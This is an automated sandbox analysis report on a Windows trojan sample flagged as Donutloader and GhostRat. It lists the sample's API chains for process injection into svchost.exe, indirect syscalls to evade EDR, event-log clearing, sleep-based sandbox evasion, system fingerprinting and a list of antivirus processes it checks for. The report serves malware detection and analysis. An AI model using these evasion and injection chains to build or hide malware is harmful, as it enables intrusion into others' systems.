                    Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: C:\Users\Public\Pictures\any.png, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ...Slnt
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@1/2
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608BE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,OpenProcess,0_2_000001CFB9608BE0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9609240 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,0_2_000001CFB9609240
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608D60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_000001CFB9608D60
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608180 GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,0_2_000001CFB9608180
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607420 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_000001CFB9607420
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607A90 CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,0_2_000001CFB9607A90
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].pngJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 6.19
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 2IVWAPeiZm.exeReversingLabs: Detection: 57%
                    Source: 2IVWAPeiZm.exeVirustotal: Detection: 59%
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dinput8.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: devenum.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msdmo.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: 2IVWAPeiZm.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: 2IVWAPeiZm.exeStatic file information: File size 11845632 > 1048576
                    Source: 2IVWAPeiZm.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0xb31800
                    Source: 2IVWAPeiZm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb%% source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdb7 source: 2IVWAPeiZm.exe
                    Source: Binary string: F:\SDKUPDATE\online_win\targets\win32\msc_lua\Release\msc.pdb source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,0_2_000001CFB9608A70
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96268D1 push rbp; retf 0_2_000001CFB96268D4
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB962C382 pushfq ; ret 0_2_000001CFB962C399
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB962A5EA push rsp; iretd 0_2_000001CFB962A5F9
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93A5DBA push ebp; iretd 0_2_000001CFB93A5DC4
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB939B348 push esp; iretd 0_2_000001CFB939B349
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C8D95 pushfd ; ret 0_2_000001CFB95C8D96
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960D17A OpenEventLogW,ClearEventLogW,CloseEventLog,0_2_000001CFB960D17A
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059Jump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-32568
                    Found stalling execution ending in API Sleep call
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeStalling execution: Execution stalls by calling Sleepgraph_0-32583
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 800Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 3347Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 5011Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-32118
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-32422
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-32418
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7376Thread sleep count: 267 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep count: 800 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep time: -800000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7420Thread sleep count: 3347 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7420Thread sleep time: -33470s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep count: 5011 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep time: -5011000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96098C0 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,0_2_000001CFB96098C0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96089F0 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_000001CFB96089F0
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB74F5000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeAPI call chain: ExitProcess graph end nodegraph_0-32664
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96149D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000001CFB96149D8
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,0_2_000001CFB9608A70
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607BF0 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,0_2_000001CFB9607BF0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96107A0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,0_2_000001CFB96107A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96149D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000001CFB96149D8
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96118A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000001CFB96118A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F6085050 SetUnhandledExceptionFilter,0_2_00007FF6F6085050
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F6084118 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F6084118
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F60842F8 SetUnhandledExceptionFilter,0_2_00007FF6F60842F8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96095B0 GetSystemDirectoryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,0_2_000001CFB96095B0
                    Contains functionality to inject threads in other processes
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608E20 GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread,0_2_000001CFB9608E20
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtUnmapViewOfSection: Indirect: 0x1CFB9313B24Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtMapViewOfSection: Indirect: 0x1CFB9313B90Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtMapViewOfSection: Indirect: 0x1CFB9313653Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe0_2_000001CFB9608E20
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113072764.000001CFBA030000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.1797753089.000001CFBA0E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.3900337582.000001CFBA070000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .2.4 0 min724536Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .2.4 0 min724536Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: gethostname,gethostbyname,inet_ntoa,inet_ntoa,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetTickCount,_localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,0_2_000001CFB96067B0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: GetLocaleInfoW,0_2_000001CFB9626190
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96107A0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,0_2_000001CFB96107A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96188E0 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000001CFB96188E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96142A8 HeapCreate,GetVersion,HeapSetInformation,0_2_000001CFB96142A8
                    Source: 2IVWAPeiZm.exeBinary or memory string: acs.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: kxetray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avcenter.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: vsserv.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: KSafeTray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: cfp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360Safe.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360tray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: rtvscan.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: ashDisp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: TMBMSRV.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360Tray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avgwdsvc.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: AYAgent.aye
                    Source: 2IVWAPeiZm.exeBinary or memory string: RavMonD.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: QUHLPSVC.EXE
                    Source: 2IVWAPeiZm.exeBinary or memory string: Mcshield.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: K7TSecurity.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected GhostRat
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba34ac51.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb924647d.50.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.21.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba385181.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba432c61.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.42.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.39.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.38.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923b8cd.32.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92413ed.41.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.46.unpack, type: UNPACKEDPE
